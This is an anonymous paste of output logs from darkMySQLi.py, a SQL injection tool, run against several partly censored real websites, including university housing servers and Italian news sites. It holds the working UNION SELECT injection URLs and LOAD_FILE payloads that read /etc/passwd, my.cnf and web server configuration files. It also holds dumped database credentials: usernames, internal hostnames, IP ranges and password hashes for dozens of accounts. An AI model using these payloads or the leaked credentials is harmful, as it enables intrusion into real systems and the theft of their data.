Posted by Anonymous on Fri 17 Jul 22:52
- |--------------------------------------------------|
- | rsauron@gmail.com v1.6 |
- | 1/2009 darkMySQLi.py |
- | -- Multi Purpose MySQL Injection Tool -- |
- | Usage: darkMySQLi.py [options] |
- | -h help darkc0de.com |
- |--------------------------------------------------|
- [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
- [+] 19:13:05
- [+] Evasion: + --
- [+] Cookie: None
- [+] SSL: No
- [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
- [+] Proxy Not Given
- [+] Gathering MySQL Server Configuration...
- Database: lazio
- User: uisp@localhost
- Version: 4.0.25-log
- |--------------------------------------------------|
- | rsauron@gmail.com v1.6 |
- | 1/2009 darkMySQLi.py |
- | -- Multi Purpose MySQL Injection Tool -- |
- | Usage: darkMySQLi.py [options] |
- | -h help darkc0de.com |
- |--------------------------------------------------|
- [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
- [+] 19:15:02
- [+] Evasion: + --
- [+] Cookie: None
- [+] SSL: No
- [+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
- [+] Proxy Not Given
- [+] Gathering MySQL Server Configuration...
- Database: lazio
- User: uisp@localhost
- Version: 4.0.25-log[+] Beginning table and column fuzzer...
- [+] Number of tables names to be fuzzed: 87
- [+] Number of column names to be fuzzed: 125
- [+] Searching for tables and columns...
- [+] Found a table called: user
- [+] Now searching for columns inside table "user"
- [-] Done searching inside table "user" for columns!
- [+] Found a table called: mysql.user
- [+] Now searching for columns inside table "mysql.user"
- [-] Done searching inside table "mysql.user" for columns!
- [+] Found a table called: news
- [+] Now searching for columns inside table "news"
- [-] Done searching inside table "news" for columns!
- [-] [19:23:35]
- [-] Total URL Requests: 463
- [-] Done
- |--------------------------------------------------|
- | rsauron@gmail.com v1.6 |
- | 1/2009 darkMySQLi.py |
- | -- Multi Purpose MySQL Injection Tool -- |
- | Usage: darkMySQLi.py [options] |
- | -h help darkc0de.com |
- |--------------------------------------------------|
- [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
- [+] 19:23:46
- [+] Evasion: + --
- [+] Cookie: None
- [+] SSL: No
- [+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
- [+] Proxy Not Given
- [+] Gathering MySQL Server Configuration...
- Database: lazio
- User: uisp@localhost
- Version: 4.0.25-log
- [+] Dumping data from database "lazio" Table "user"
- [+] Column(s) ['id_user', 'password']
- [+] Number of Rows: 3
- [1] 1:43d97712a3d49112c478ff42e7a3cd69:
- [2] 2:ba50d008b5b8e57b7764d8319369eeb6:
- [3] 3:a472c4f62f70e7d432f4444b8c7c1642:
- [-] [19:23:48]
- [-] Total URL Requests: 5
- [-] Done
- |--------------------------------------------------|
- | rsauron@gmail.com v1.6 |
- | 1/2009 darkMySQLi.py |
- | -- Multi Purpose MySQL Injection Tool -- |
- | Usage: darkMySQLi.py [options] |
- | -h help darkc0de.com |
- |--------------------------------------------------|
- [+] URL: http://[CENSORED].edu/article.php?pid=5+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5
- [+] 20:51:38
- [+] Evasion: + --
- [+] Cookie: None
- [+] SSL: No
- [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
- [+] Proxy Not Given
- [+] Gathering MySQL Server Configuration...
- Database: linux
- User: linux@web-4.uta.edu
- Version: 5.0.45-log
- [+] Do we have Access to MySQL Database: NO
- [-] MySQL user enumeration has been skipped!
- [-] We do not have access to mysql DB on this target!
- [+] Do we have Access to Load_File: NO
- [-] Load_File Fuzzer has been by skipped!
- [-] Load_File disabled on this target!
- [-] [20:51:45]
- [-] Total URL Requests: 3
- [-] Done
- |--------------------------------------------------|
- | rsauron@gmail.com v1.6 |
- | 1/2009 darkMySQLi.py |
- | -- Multi Purpose MySQL Injection Tool -- |
- | Usage: darkMySQLi.py [options] |
- | -h help darkc0de.com |
- |--------------------------------------------------|
- [+] URL: http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+darkc0de,2,3,4,5,darkc0de,darkc0de,8,darkc0de,10
- [+] 20:53:38
- [+] Evasion: + --
- [+] Cookie: None
- [+] SSL: No
- [+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
- [+] Proxy Not Given
- [+] Gathering MySQL Server Configuration...
- Database: news
- User: root@jupiter.housing.[CENSORED].edu
- Version: 4.1.20-log
- [+] Do we have Access to MySQL Database: YES <-- w00t w00t
- [+] Dumping MySQL user info. host:user:password[+] Number of users in the mysql.user table: 59
- [0] localhost:root:1d7061767ec0f189
- [1] trogdor:root:
- [2] localhost::1d7061767ec0f189
- [3] trogdor::
- [4] *:root:1d7061767ec0f189
- [5] %:root:1d7061767ec0f189
- [6] localhost:nagios:62068042172418e8
- [7] 128.104.56.%:infotech:1d7061767ec0f189
- [8] %:housingwebserver:5d5deacd6a134128
- [9] 146.151.2.%:infotech:1d7061767ec0f189
- [10] *:housingwebserver:5d5deacd6a134128
- [11] localhost.localdomain:root:1d7061767ec0f189
- [12] %:wiki:71a82a1928270347
- [13] localhost:wiki:71a82a1928270347
- [14] localhost.localdomain:wiki:71a82a1928270347
- [15] %:aesop:*DBE8FC7F0D38B886FF717773D166C88A53057AA7
- [16] 10.146.%.%:aesop:*DBE8FC7F0D38B886FF717773D166C88A53057AA7
- [17] jupiter%.housing.[CENSORED].edu:labman:*1BA54CAC1C9DBADFE5285D2FF6B943B0C9AC3351
- [18] 128.104.56.68:labman:*1BA54CAC1C9DBADFE5285D2FF6B943B0C9AC3351
- [19] jupiter%.housing.[CENSORED].edu:mrbs:764628e26aff0ffb
- [20] 128.104.56.39:mrbs:764628e26aff0ffb
- [21] Jupiter2.housing.[CENSORED].edu:mrbs:764628e26aff0ffb
- [22] 128.104.56.39:labman:*1BA54CAC1C9DBADFE5285D2FF6B943B0C9AC3351
- [23] 128.104.56.75:labman:4e2e57e527392663
- [24] nathan-computer.housing.[CENSORED].edu:phpwebsite_admin:*FFE8FE6B11154482DD528AB354F12CD0925E41B8
- [25] jupiter%.housing.[CENSORED].edu:phpwebsite_user:*D87CDE2186BA156ED1F6101FC04EDA373A867F35
- [26] jupiter2.housing.[CENSORED].edu:phpwebsite_user:*D87CDE2186BA156ED1F6101FC04EDA373A867F35
- [27] 146.151.2.4:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
- [28] 128.104.56.39:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
- [29] jupiter%.housing.[CENSORED].edu:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
- [30] 128.104.56.75:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
- [31] jupiter%.housing.[CENSORED].edu:gaming_signup:*065954C938398AA43EBA15E9D52372CFAAB09847
- [32] jupiter%.housing.[CENSORED].edu:trecs:*BB5B9FF3DDA2C4E94761CBB828CA7BE4518C5A24
- [33] jupiter%.housing.[CENSORED].edu:trecs_read:*1753E38D50A040449857EE4ED9656FA31CC22502
- [34] dev-web.housing.[CENSORED].edu:trecs_test:*B431DCFD19306523BED0B7711790F55CE3EE501D
- [35] jupiter%.housing.[CENSORED].edu:comments:*CC967383FC43C582DCDB28EDCB44019E8287DAA7
- [36] jupiter%.housing.[CENSORED].edu:webauthorwiki:*CCF9043583D9D699CF84C30FAED87624B22247F5
- [37] jupiter%.housing.[CENSORED].edu:photos:*E66EA629FEC2AA58813A580ACCB2B1EBA942F745
- [38] jupiter%.housing.[CENSORED].edu:classconnections:*A853E757A87A7DC90918CEB189DF07AEF97E7F05
- [39] jupiter%.housing.[CENSORED].edu:rh_classes_read:*0DE4BF21764C68924261C00801A55E0D232FAAE2
- [40] jupiter%.housing.[CENSORED].edu:reshall_classes:*487E8FD6FB0B7C95A6F0E251573D55AD9B08D672
- [41] jupiter%.housing.[CENSORED].edu:interestconns:*93E27F1224D58430FA884F5F70B2EDE20B63DB5C
- [42] jupiter%.housing.[CENSORED].edu:halldeskforum:*DB062717E8903030F561017B065F01A740AA2337
- [43] jupiter%.housing.[CENSORED].edu:intconns_read:*E59C798F5717FA359DA1976077139ECB0D1CCB76
- [44] jupiter%.housing.[CENSORED].edu:omega_read:*D98F1D2016D595FAE351D2D1971856F84DBE0FE3
- [45] jupiter%.housing.[CENSORED].edu:omega:*5BF8DD2EE06D24BF323934998EBACBA74D1DF1A8
- [46] jupiter%.housing.[CENSORED].edu:tutor_log:*D367B908E558098D85E781831A7829DA9CE22C52
- [47] jupiter%.housing.[CENSORED].edu:reslife_testing:*15AE030DF51D192AA5A9CDDB7637092726114FE4
- [48] %.housing.[CENSORED].edu:eweiss:*05391D93ACA052EF907794B253F0626D37DE93F0
- [49] %housing.[CENSORED].edu:reslife_testing:
- [50] %.housing.[CENSORED].edu:jpmielens:*7AC527A8617BDCEAAFC80CB8B8324747999B91E9
- [51] %.housing.[CENSORED].edu:cherwinka:*E7FBCBE21AF99DE865DAD8C32059DE1F1332DE7E
- [52] %.housing.[CENSORED].edu:efhanson:*74335AFE095A7B1948E0D3A2869E72B3DE07758D
- [53] jupiter%.housing.[CENSORED].edu:events_read:*D3D085E058505D0D626133425CF466DB1763B3A9
- [54] jupiter%.housing.[CENSORED].edu:eventscalendar:*5B9EA7F5EAC55A69EB9875648B47A49798224DCD
- [55] jupiter%.housing.[CENSORED].edu:studygroups:*3133D9DF58AC305F79CA7FB14550F052C0B1E2F1
- [56] %.housing.[CENSORED].edu:hwerner:*CD9CEFEBF56C7BD770A126DAAB50E156792457BE
- [57] hsg-lae006.housing.[CENSORED].edu:root:*06D8B6D09ED6313722D02AC093B342CB35B3CD06
- [58] %.housing.[CENSORED].edu:omega_dev:*3ED288D0DA311DF6100147818E80BA2F82C13676
- [+] Do we have Access to Load_File: YES <-- w00t w00t
- [+] Starting Load_File Fuzzer...
- [+] Number of tables names to be fuzzed: 237
- [!] Found /etc/passwd
- [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,LOAD_FILE(0x2f6574632f706173737764),LOAD_FILE(0x2f6574632f706173737764),8,LOAD_FILE(0x2f6574632f706173737764),10--
- [!] Found /etc/hosts
- [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f686f737473),2,3,4,5,LOAD_FILE(0x2f6574632f686f737473),LOAD_FILE(0x2f6574632f686f737473),8,LOAD_FILE(0x2f6574632f686f737473),10--
- [!] Found /etc/motd
- [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6d6f7464),2,3,4,5,LOAD_FILE(0x2f6574632f6d6f7464),LOAD_FILE(0x2f6574632f6d6f7464),8,LOAD_FILE(0x2f6574632f6d6f7464),10--
- [!] Found /etc/fstab
- [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6673746162),2,3,4,5,LOAD_FILE(0x2f6574632f6673746162),LOAD_FILE(0x2f6574632f6673746162),8,LOAD_FILE(0x2f6574632f6673746162),10--
- [!] Found /etc/httpd/conf/httpd.conf
- [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),2,3,4,5,LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),8,LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),10--
- [!] Found /etc/my.cnf
- [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6d792e636e66),2,3,4,5,LOAD_FILE(0x2f6574632f6d792e636e66),LOAD_FILE(0x2f6574632f6d792e636e66),8,LOAD_FILE(0x2f6574632f6d792e636e66),10--
- [!] Found /etc/sysconfig/network-scripts/ifcfg-eth0
- [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),2,3,4,5,LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),8,LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),10--
- [!] Found /etc/redhat-release
- [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),2,3,4,5,LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),8,LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),10--
- [!] Found /etc/httpd/conf.d/php.conf
- [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),2,3,4,5,LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),8,LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),10--
- [!] Found /etc/group
- [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f67726f7570),2,3,4,5,LOAD_FILE(0x2f6574632f67726f7570),LOAD_FILE(0x2f6574632f67726f7570),8,LOAD_FILE(0x2f6574632f67726f7570),10--
- [!] Found /etc/php.ini
- [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f7068702e696e69),2,3,4,5,LOAD_FILE(0x2f6574632f7068702e696e69),LOAD_FILE(0x2f6574632f7068702e696e69),8,LOAD_FILE(0x2f6574632f7068702e696e69),10--
- [-] [21:00:32]
- [-] Total URL Requests: 301
- [-] Done
- |--------------------------------------------------|
- | rsauron@gmail.com v1.6 |
- | 1/2009 darkMySQLi.py |
- | -- Multi Purpose MySQL Injection Tool -- |
- | Usage: darkMySQLi.py [options] |
- | -h help darkc0de.com |
- |--------------------------------------------------|
- [+] URL: http://www.[CENSORED].it/lettere_direttore/commenti.php?artid=1165+AND+1=2+UNION+SELECT+1,2,3,darkc0de,5,6,7
- [+] 21:08:29
- [+] Evasion: + --
- [+] Cookie: None
- [+] SSL: No
- [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
- [+] Proxy Not Given
- [+] Gathering MySQL Server Configuration...
- Database: [CENSORED]
- User: [CENSORED]@localhost
- Version: 5.0.45-log
- [+] Do we have Access to MySQL Database: NO
- [-] MySQL user enumeration has been skipped!
- [-] We do not have access to mysql DB on this target!
- [+] Do we have Access to Load_File: NO
- [-] Load_File Fuzzer has been by skipped!
- [-] Load_File disabled on this target!
- [-] [21:08:32]
- [-] Total URL Requests: 3
- [-] Done
Follow on Twitter!